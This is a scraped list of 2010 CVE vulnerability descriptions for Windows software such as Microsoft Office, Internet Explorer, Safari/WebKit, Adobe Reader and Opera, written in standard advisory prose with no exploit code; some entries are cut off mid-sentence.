Word 2002 SP3 and Office 2004 for Mac do not properly check an unspecified boundary during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Boundary Check Vulnerability." [CVE-2010-2747] Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly handle an uninitialized pointer during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Uninitialized Pointer Vulnerability." [CVE-2010-2734] Cross-site scripting (XSS) vulnerability in the mobile portal in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "XSS Issue on UAG Mobile Portal Website in Forefront Unified Access Gateway Vulnerability." [CVE-2010-2733] Cross-site scripting (XSS) vulnerability in the Web Monitor in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "UAG XSS Allows EOP Vulnerability." [CVE-2010-2732] Open redirect vulnerability in the web interface in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, aka "UAG Redirection Spoofing Vulnerability." [CVE-2010-2730] Buffer overflow in Microsoft Internet Information Services (IIS) 7.5, when FastCGI is enabled, allows remote attackers to execute arbitrary code via crafted headers in a request, aka "Request Header Buffer Overflow Vulnerability." [CVE-2010-2728] Heap-based buffer overflow in Microsoft Outlook 2002 SP3, 2003 SP3, and 2007 SP2, when Online Mode for an Exchange Server is enabled, allows remote attackers to execute arbitrary code via a crafted e-mail message, aka "Heap Based Buffer Overflow in Outlook Vulnerability." [CVE-2010-2703] Stack-based buffer overflow in the execvp_nc function in the ov.dll module in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53, when running on Windows, allows remote attackers to execute arbitrary code via a long HTTP request to webappmon.exe. [CVE-2010-2666] Opera before 10.54 on Windows and Mac OS X does not properly enforce permission requirements for widget filesystem access and directory selection, which allows user-assisted remote attackers to create or modify arbitrary files, and consequently execute arbitrary code, via widget File I/O operations. [CVE-2010-2665] Cross-site scripting (XSS) vulnerability in Opera before 10.54 on Windows and Mac OS X, and before 10.11 on UNIX platforms, allows remote attackers to inject arbitrary web script or HTML via a data: URI, related to incorrect detection of the "opening site." [CVE-2010-2661] Opera before 10.54 on Windows and Mac OS X, and before 10.60 on UNIX platforms, does not properly restrict access to the full pathname of a file selected for upload, which allows remote attackers to obtain potentially sensitive information via unspecified DOM manipulations. [CVE-2010-2660] Opera before 10.54 on Windows and Mac OS X, and before 10.60 on UNIX platforms, does not properly restrict certain uses of homograph characters in domain names, which makes it easier for remote attackers to spoof IDN domains via unspecified choices of characters. [CVE-2010-2659] Opera before 10.50 on Windows, before 10.52 on Mac OS X, and before 10.60 on UNIX platforms makes widget properties accessible to third-party domains, which allows remote attackers to obtain potentially sensitive information via a crafted web site. [CVE-2010-2657] Opera before 10.60 on Windows and Mac OS X does not properly prevent certain double-click operations from running a program located on a web site, which allows user-assisted remote attackers to execute arbitrary code via a crafted web page that bypasses a dialog. [CVE-2010-2594] Multiple cross-site request forgery (CSRF) vulnerabilities in the web management interface in InterSect Alliance Snare Agent 3.2.3 and earlier on Solaris, Snare Agent 3.1.7 and earlier on Windows, Snare Agent 1.5.0 and earlier on Linux and AIX, Snare Agent 1.4 and earlier on IRIX, Snare Epilog 1.5.3 and earlier on Windows, and Snare Epilog 1.2 and earlier on UNIX allow remote attackers to hijack the authentication of administrators for requests that (1) change the password or (2) change the listening port. [CVE-2010-2573] Integer underflow in Microsoft PowerPoint 2002 SP3 and 2003 SP3, PowerPoint Viewer SP2, and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint Integer Underflow Causes Heap Corruption Vulnerability." [CVE-2010-2572] Buffer overflow in Microsoft PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint 95 document, aka "PowerPoint Parsing Buffer Overflow Vulnerability." [CVE-2010-2571] Array index error in pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher 97 file, aka "Memory Corruption Due To Invalid Index Into Array in Pubconv.dll Vulnerability." [CVE-2010-2570] Heap-based buffer overflow in pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3, 2003 SP3, 2007 SP2, and 2010 allows remote attackers to execute arbitrary code via a crafted Publisher file that uses an old file format, aka "Heap Overrun in pubconv.dll Vulnerability." [CVE-2010-2569] pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3, 2003 SP3, and 2007 SP2 does not properly handle an unspecified size field in certain older file formats, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted Publisher file, aka "Size Value Heap Corruption in pubconv.dll Vulnerability." [CVE-2010-2562] Microsoft Office Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Excel file, aka "Excel Memory Corruption Vulnerability." [CVE-2010-2561] Microsoft XML Core Services (aka MSXML) 3.0 does not properly handle HTTP responses, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted response, aka "Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption Vulnerability." [CVE-2010-2560] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Layout Memory Corruption Vulnerability." [CVE-2010-2559] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3671, CVE-2009-3674, CVE-2010-0245, and CVE-2010-0246. [CVE-2010-2558] Race condition in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via vectors related to an object in memory, aka "Race Condition Memory Corruption Vulnerability." [CVE-2010-2557] Microsoft Internet Explorer 6 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-2556] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-2489] Buffer overflow in Ruby 1.9.x before 1.9.1-p429 on Windows might allow local users to gain privileges via a crafted ARGF.inplace_mode value that is not properly handled when constructing the filenames of the backup files. [CVE-2010-2442] Microsoft Internet Explorer, possibly 8, does not properly restrict focus changes, which allows remote attackers to read keystrokes via "cross-domain IFRAME gadgets." [CVE-2010-2428] Cross-site scripting (XSS) vulnerability in admin_loginok.html in the Administrator web interface in Wing FTP Server for Windows 3.5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted POST request. [CVE-2010-2264] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document. [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI. [CVE-2010-2212] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via a PDF file containing Flash content with a crafted #1023 (3FFh) tag, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, and CVE-2010-2211. [CVE-2010-2211] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, and CVE-2010-2212. [CVE-2010-2210] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-2209] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-2208] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, dereference a heap object after this object's deletion, which allows attackers to execute arbitrary code via unspecified vectors. [CVE-2010-2207] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-2206] Array index error in AcroForm.api in Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted GIF image in a PDF file, which bypasses a size check and triggers a heap-based buffer overflow. [CVE-2010-2205] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, access uninitialized memory, which allows attackers to execute arbitrary code via unspecified vectors. [CVE-2010-2204] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors. [CVE-2010-2202] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-2201] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code via a PDF file with crafted Flash content involving the (1) pushstring (0x2C) operator, (2) debugfile (0xF1) operator, and an "invalid pointer vulnerability" that triggers memory corruption, a different vulnerability than CVE-2010-1285 and CVE-2010-2168. [CVE-2010-2168] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code via a PDF file with crafted Flash content, involving the newfunction (0x44) operator and an "invalid pointer vulnerability" that triggers memory corruption, a different vulnerability than CVE-2010-1285 and CVE-2010-2201. [CVE-2010-2157] Unspecified vulnerability in CA ARCserve Backup r11.5 SP4, r12.0 SP2, and r12.5 SP1 on Windows allows local users to obtain sensitive information via unknown vectors. [CVE-2010-2119] Microsoft Internet Explorer 6.0.2900.2180 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid nntp:// URIs. [CVE-2010-2118] Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs. [CVE-2010-2090] The npb_protocol_error function in sna V5router64 in IBM Communications Server for Windows 6.1.3 and Communications Server for AIX (aka CSAIX or CS/AIX) in sna.rte before 6.3.1.2 allows remote attackers to cause a denial of service (daemon crash) via APPC data containing a GDSID variable with a GDS length that is too small. [CVE-2010-2088] ASP.NET in Microsoft .NET 3.5 does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks against the form control via the __VIEWSTATE parameter. [CVE-2010-2085] The default configuration of ASP.NET in Microsoft .NET before 1.1 has a value of FALSE for the EnableViewStateMac property, which allows remote attackers to conduct cross-site scripting (XSS) attacks via the __VIEWSTATE parameter. [CVE-2010-2084] Microsoft ASP.NET 2.0 does not prevent setting the InnerHtml property on a control that inherits from HtmlContainerControl, which allows remote attackers to conduct cross-site scripting (XSS) attacks via vectors related to an attribute. [CVE-2010-2083] Microsoft Dynamics GP has a default value of ACCESS for the system password, which might make it easier for remote authenticated users to bypass intended access restrictions via unspecified vectors. [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. [CVE-2010-2011] Microsoft Dynamics GP uses a substitution cipher to encrypt the system password field and unspecified other fields, which makes it easier for remote authenticated users to obtain sensitive information by decrypting a field's contents. [CVE-2010-1991] Microsoft Internet Explorer 6.0.2900.2180, 7, and 8.0.7600.16385 executes a mail application in situations where an IFRAME element has a mailto: URL in its SRC attribute, which allows remote attackers to cause a denial of service (excessive application launches) via an HTML document with many IFRAME elements. [CVE-2010-1988] Mozilla Firefox 3.6.3 on Windows XP SP3 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or possibly execute arbitrary code via JavaScript code that performs certain string concatenation and substring operations, a different vulnerability than CVE-2009-1571. [CVE-2010-1987] Mozilla Firefox 3.6.3 on Windows XP SP3 allows remote attackers to cause a denial of service (memory consumption, out-of-bounds read, and application crash) via JavaScript code that appends long strings to the content of a P element, and performs certain other string concatenation and substring operations, related to the DoubleWideCharMappedString class in USP10.dll and the gfxWindowsFontGroup::GetUnderlineOffset function in xul.dll, a different vulnerability than CVE-2009-1571. [CVE-2010-1986] Mozilla Firefox 3.6.3 on Windows XP SP3 allows remote attackers to cause a denial of service (memory consumption and application crash) via JavaScript code that creates multiple arrays containing elements with long string values, and then appends long strings to the content of a P element, related to the gfxWindowsFontGroup::MakeTextRun function in xul.dll, a different vulnerability than CVE-2009-1571. [CVE-2010-1971] Cross-site request forgery (CSRF) vulnerability in HP Insight Software Installer for Windows before 6.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors, a different vulnerability than CVE-2010-1968. [CVE-2010-1970] Unspecified vulnerability in HP Insight Software Installer for Windows before 6.1 allows local users to read or modify data, and consequently gain privileges, via unknown vectors. [CVE-2010-1969] Cross-site scripting (XSS) vulnerability in HP Virtual Connect Enterprise Manager for Windows before 6.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2010-1968] Cross-site request forgery (CSRF) vulnerability in HP Insight Software Installer for Windows before 6.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors, a different vulnerability than CVE-2010-1971. [CVE-2010-1967] Unspecified vulnerability in HP Insight Software Installer for Windows before 6.1 allows local users to read or modify data via unknown vectors. [CVE-2010-1966] Unspecified vulnerability in HP Insight Control power management for Windows before 6.1 allows local users to read or modify data, or cause a denial of service, via unknown vectors. [CVE-2010-1965] Unspecified vulnerability in HP Insight Orchestration for Windows before 6.1 allows remote attackers to read or modify data via unknown vectors. [CVE-2010-1940] Apple Safari 4.0.5 on Windows sends the "Authorization: Basic" header appropriate for one web site to a different web site named in a Location header received from the first site, which allows remote web servers to obtain sensitive information by logging HTTP requests. NOTE: the provenance of this information is unknown [CVE-2010-1939] Use-after-free vulnerability in Apple Safari 4.0.5 on Windows allows remote attackers to execute arbitrary code by using window.open to create a popup window for a crafted HTML document, and then calling the parent window's close method, which triggers improper handling of a deleted window object. [CVE-2010-1903] Microsoft Office Word 2002 SP3 and 2003 SP3, and Office Word Viewer, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a malformed record in a Word file, aka "Word HTML Linked Objects Memory Corruption Vulnerability." [CVE-2010-1902] Buffer overflow in Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2010-1901] Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2010-1900] Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2010-1899] Stack consumption vulnerability in the ASP implementation in Microsoft Internet Information Services (IIS) 5.1, 6.0, 7.0, and 7.5 allows remote attackers to cause a denial of service (daemon outage) via a crafted request, related to asp.dll, aka "IIS Repeated Parameter Request Denial of Service Vulnerability." [CVE-2010-1881] The FieldList ActiveX control in the Microsoft Access Wizard Controls in ACCWIZ.dll in Microsoft Office Access 2003 SP3 does not properly interact with the memory-access approach used by Internet Explorer and Office during instantiation, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via an HTML document that references this control along with crafted persistent storage data, aka "ACCWIZ.dll Uninitialized Variable Vulnerability." [CVE-2010-1852] Microsoft Internet Explorer, when the Invisible Hand extension is enabled, uses cookies during background HTTP requests in a possibly unexpected manner, which might allow remote web servers to identify specific persons and their product searches via HTTP request logging, related to a "cross-site data leakage" issue. [CVE-2010-1824] Use-after-free vulnerability in WebKit, as used in Apple iTunes before 10.2 on Windows, Apple Safari, and Google Chrome before 6.0.472.59, allows remote attackers to execute arbitrary code or cause a denial of service via vectors related to SVG styles, the DOM tree, and error messages. [CVE-2010-1805] Untrusted search path vulnerability in Apple Safari 4.x before 4.1.2 and 5.x before 5.0.2 on Windows allows local users to gain privileges via a Trojan horse explorer.exe (aka Windows Explorer) program in a directory containing a file that had been downloaded by Safari. [CVE-2010-1799] Stack-based buffer overflow in the error-logging functionality in Apple QuickTime before 7.6.7 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file. [CVE-2010-1796] The AutoFill feature in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to obtain sensitive Address Book Card information via JavaScript code that forces keystroke events for input fields. [CVE-2010-1795] Untrusted search path vulnerability in Apple iTunes before 9.1, when running on Windows 7, Vista, and XP, allows local users and possibly remote attackers to gain privileges via a Trojan horse DLL in the current working directory. [CVE-2010-1793] Multiple use-after-free vulnerabilities in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1792] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1791] Integer signedness error in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving a JavaScript array index. [CVE-2010-1790] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1789] Heap-based buffer overflow in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a JavaScript string object. [CVE-2010-1788] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1787] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1786] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1785] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1784] The counters functionality in the Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1783] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1782] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1780] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1778] Cross-site scripting (XSS) vulnerability in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via an RSS feed. [CVE-2010-1774] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses out-of-bounds memory during processing of HTML tables, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document. [CVE-2010-1771] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving fonts. [CVE-2010-1770] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, Apple Safari before 4.1 on Mac OS X 10.4, and Google Chrome before 5.0.375.70 does not properly handle a transformation of a text node that has the IBM1147 character set, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document containing a BR element, related to a "type checking issue." [CVE-2010-1769] WebKit in Apple iTunes before 9.2 on Windows, and Apple iOS before 4 on the iPhone and iPod touch, accesses out-of-bounds memory during the handling of tables, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, a different vulnerability than CVE-2010-1387 and CVE-2010-1763. [CVE-2010-1764] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, follows multiple redirections during form submission, which allows remote web servers to obtain sensitive information by recording the form data. [CVE-2010-1763] Unspecified vulnerability in WebKit in Apple iTunes before 9.2 on Windows has unknown impact and attack vectors, a different vulnerability than CVE-2010-1387 and CVE-2010-1769. [CVE-2010-1762] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving HTML in a TEXTAREA element. [CVE-2010-1761] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving HTML document subtrees. [CVE-2010-1759] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the Node.normalize method. [CVE-2010-1758] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving DOM Range objects. [CVE-2010-1750] Use-after-free vulnerability in Apple Safari before 5.0 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to improper window management. [CVE-2010-1749] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the Cascading Style Sheets (CSS) run-in property and multiple invocations of a destructor for a child element that has been referenced multiple times. [CVE-2010-1728] Opera before 10.53 on Windows and Mac OS X does not properly handle a series of document modifications that occur asynchronously, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via JavaScript that writes <marquee> sequences in an infinite loop, leading to attempted use of uninitialized memory. NOTE: this might overlap CVE-2006-6955. [CVE-2010-1681] Buffer overflow in VISIODWG.DLL before 10.0.6880.4 in Microsoft Office Visio allows user-assisted remote attackers to execute arbitrary code via a crafted DXF file, a different vulnerability than CVE-2010-0254 and CVE-2010-0256. [CVE-2010-1508] Heap-based buffer overflow in Apple QuickTime before 7.6.9 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Track Header (aka tkhd) atoms. [CVE-2010-1489] The XSS Filter in Microsoft Internet Explorer 8 does not properly perform neutering for the SCRIPT tag, which allows remote attackers to conduct cross-site scripting (XSS) attacks against web sites that have no inherent XSS vulnerabilities, a different issue than CVE-2009-4074. [CVE-2010-1423] Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versions, when running on Windows and possibly on Linux, allows remote attackers to execute arbitrary code via the (1) -J or (2) -XXaltjvm argument to javaws.exe, which is processed by the launch method. NOTE: some of these details are obtained from third party information. [CVE-2010-1422] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle changes to keyboard focus that occur during processing of key press events, which allows remote attackers to force arbitrary key presses via a crafted HTML document. [CVE-2010-1421] The execCommand JavaScript function in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly restrict remote execution of clipboard commands, which allows remote attackers to modify the clipboard via a crafted HTML document. [CVE-2010-1419] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows user-assisted remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving a certain window close action that occurs during a drag-and-drop operation. [CVE-2010-1418] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via a FRAME element with a SRC attribute composed of a javascript: sequence preceded by spaces. [CVE-2010-1417] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via HTML content that contains multiple :after pseudo-selectors. [CVE-2010-1416] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly restrict the reading of a canvas that contains an SVG image pattern from a different web site, which allows remote attackers to read images from other sites via a crafted canvas, related to a "cross-site image capture issue." [CVE-2010-1415] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle libxml contexts, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, related to an "API abuse issue." [CVE-2010-1414] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the removeChild DOM method. [CVE-2010-1413] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, sends NTLM credentials in cleartext in unspecified circumstances, which allows man-in-the-middle attackers to obtain sensitive information via unspecified vectors. [CVE-2010-1412] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to hover events. [CVE-2010-1410] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via an SVG document with nested use elements. [CVE-2010-1409] Incomplete blacklist vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to trigger disclosure of data over IRC via vectors involving an IRC service port. [CVE-2010-1408] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to bypass intended restrictions on outbound connections to "non-default TCP ports" via a crafted port number, related to an "integer truncation issue." NOTE: this may overlap CVE-2010-1099. [CVE-2010-1406] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, sends an https URL in the Referer header of an http request in certain circumstances involving https to http redirection, which allows remote HTTP servers to obtain potentially sensitive information via standard HTTP logging, a related issue to CVE-2010-0660. [CVE-2010-1405] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML element that has custom vertical positioning. [CVE-2010-1404] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an SVG document that contains recursive Use elements, which are not properly handled during page deconstruction. [CVE-2010-1403] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses uninitialized memory during the handling of a use element in an SVG document, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted document containing XML that triggers a parsing error, related to 